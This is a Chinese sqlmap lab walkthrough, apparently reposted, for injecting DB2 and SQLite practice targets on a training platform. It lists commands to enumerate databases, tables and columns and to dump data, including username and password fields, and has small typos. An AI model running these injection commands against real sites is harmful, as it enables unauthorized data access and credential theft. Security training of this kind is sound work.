sqlmap（四）案例

一、注入DB2

http://124.70.71.251:49431/new_list.php?id=1

这是墨者学院里的靶机，地址：https://www.mozhe.cn/

1.1 测试数据库类型

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1"

1.2 测试用户权限类型

查询选项

--is-dba 查看当前用户是否为管理员

--current-usre 查看当前用户的用户名

--privileges 查看当前用户的权限

python sqlmap.py -u  "http://124.70.71.251:49431/new_list.php?id=1" --is-dba

查看当前用户的用户名

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --current-usre

查看当前用户的权限

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --privileges

1.3 查看库名

--dbs：获取系统中的所有库的名字

--current-db：获取当前库的名字

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --dbs
python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --current-db

1.4 查看表名

-D "库名" --tables

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB2INST1" --tables

1.5 查看字段名

-D "库名" -T "表名" --columns

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB@INST1" -T "NOTICE" --columns

1.6 查数据

-D "库名" -T "表名" --dump 查表中的全部数据

-D "库名" -T "表名" --dump -C "字段" 查表中指定字段中的数据

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB2INST1" -T "NOTICE" -C "CONTENT" --dump

二、注入sqlite

测试地址：http://124.70.71.251:44648/new_list.php?id=1

2.1 测试数据库类型

清除缓存：--purge

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --purge

2.2 测试用户权限类型

查询选项

--is-dba 查看当前用户是否为管理员

--current-user 查看当前用户的用户名【sqlite不支持】

--privileges 查看当前用户的权限

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --is-dba

2.3 查看库名

--dbs：获取系统中的所有库的名字【sqlite不支持】

--current-db：获取当前库的名字【sqlite不支持】

2.4 查看表名

-D "库名" --tables 【sqlite不支持】

--tables【sqlite只能这样写】

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --tables

2.5 查看字段名

-T "表名" --columns

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" -T "WSTMart_reg" --columns

2.6 查数据

-D "库名" -T "表名" --dump 查表中的全部数据

-D "库名" -T "表名" --dump -C "字段" 查看表中的指定字段中的数据

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" -T "WSTMart_reg" --dump -C "name,password"

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/521509.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

sqlmap（四）案例

一、注入DB2

1.1 测试数据库类型

1.2 测试用户权限类型

1.3 查看库名

1.4 查看表名

1.5 查看字段名

1.6 查数据

二、注入sqlite

2.1 测试数据库类型

2.2 测试用户权限类型

2.3 查看库名

2.4 查看表名

2.5 查看字段名

2.6 查数据

相关文章

WCH恒沁单片机-CH32V307学习记录2----FreeRTOS移植

深度学习理论基础（六）Transformer多头注意力机制

html骨架以及常见标签

【JavaWeb】Day33.MySQL概述

Python | Leetcode Python题解之第13题罗马数字转整数

.NET8 和 Vue.js 的前后端分离

物联网系统设计 8

Node.JS多线程PromisePool之promise-pool库实现

Mysql中的 IFNULL 函数的详解

Day106：代码审计-PHP原生开发篇文件安全上传监控功能定位关键搜索1day挖掘

HUD抬头显示器阳光倒灌实验一般步骤

单链表经典oj题 (一) 简单

博客部署001-centos安装docker

力扣Lc29---- 541. 反转字符串 II(java版)-2024年4月06日

心法利器[112] | 考古RAG-20年RAG概念提出的论文

计算机视觉——基于傅里叶幅度谱文档倾斜度检测与校正

Qt Creator 新建项目

usb_camera传输视频流编码的问题记录！

漂亮国的无人餐厅的机器人骚操作

Linux--03---虚拟机网络配置、拍摄快照和克隆